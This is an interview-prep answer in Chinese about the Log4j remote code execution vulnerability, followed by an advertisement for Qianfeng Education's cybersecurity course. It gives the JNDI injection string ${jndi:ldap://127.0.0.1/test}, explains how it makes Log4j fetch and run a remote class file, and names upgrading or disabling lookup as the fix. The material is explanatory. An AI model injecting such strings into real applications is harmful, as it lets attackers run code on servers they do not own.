面試官：Log4j rce漏洞有了解過？攻擊特征是什么？

log4j 是 javaweb 的日志組件，用來記錄 web 日志，特征是${jndi:ldap://url}

去指定下載文件的 url 在搜索框或者搜索的 url 里面，加上 ${jndi:ldap://127.0.0.1/test} ，log4j 會對這串代碼進行表達式解析，給 lookup 傳遞一個惡意的參數(shù)指定，參數(shù)指的是比如 ldap 不存在的資源 $ 是會被直接執(zhí)行的。后面再去指定下載文件的 url，去下載我們的惡意文件。比如是 x.class 下載完成后，并且會執(zhí)行代碼塊

修復：升級 Log4j 到最新版本，根據(jù)業(yè)務判斷是否關閉 lookup

千鋒教育開設了專業(yè)的網(wǎng)絡安全培訓課程，課程由千鋒教育主導，根據(jù)企業(yè)崗位定制，用人單位評估，聯(lián)合多家安全企業(yè)共同研發(fā)。依托企業(yè)項目場景，采用企業(yè)漏洞還原環(huán)境搭建，以真實企業(yè)平臺與設備實操攻防對抗，讓學習與工作相融。

優(yōu)勢一：師資團隊

業(yè)界高水平網(wǎng)絡安全工程師全程授課，項目驅動教學，讓學員在學習期間有能力上手安服、滲透等項目。

優(yōu)勢二：項目實戰(zhàn)

豐富的安全項目與 CTF 對抗賽、靶機實戰(zhàn)，幫助學員增加真實項目實戰(zhàn)經(jīng)驗，適應企業(yè)需求，拓寬職業(yè)發(fā)展空間。

優(yōu)勢三：靶場設備

依托企業(yè)項目場景，采用企業(yè)漏洞還原環(huán)境搭建，以真實企業(yè)平臺與設備實操攻防對抗，讓學習與工作相融。

優(yōu)勢四:教學模式

項目驅動教學，在教學過程中，以完成一個個具體的項目為線索，把教學內容巧妙地隱含在每個項目之中。

優(yōu)勢五：六維全息課程

六維全息課程，在專業(yè)課基礎上融入就業(yè)課和職后課，打造 " 一專多能 " 的復合型人才。

如果您對千鋒教育的網(wǎng)絡安全課程感興趣，點擊右側窗口可進行咨詢。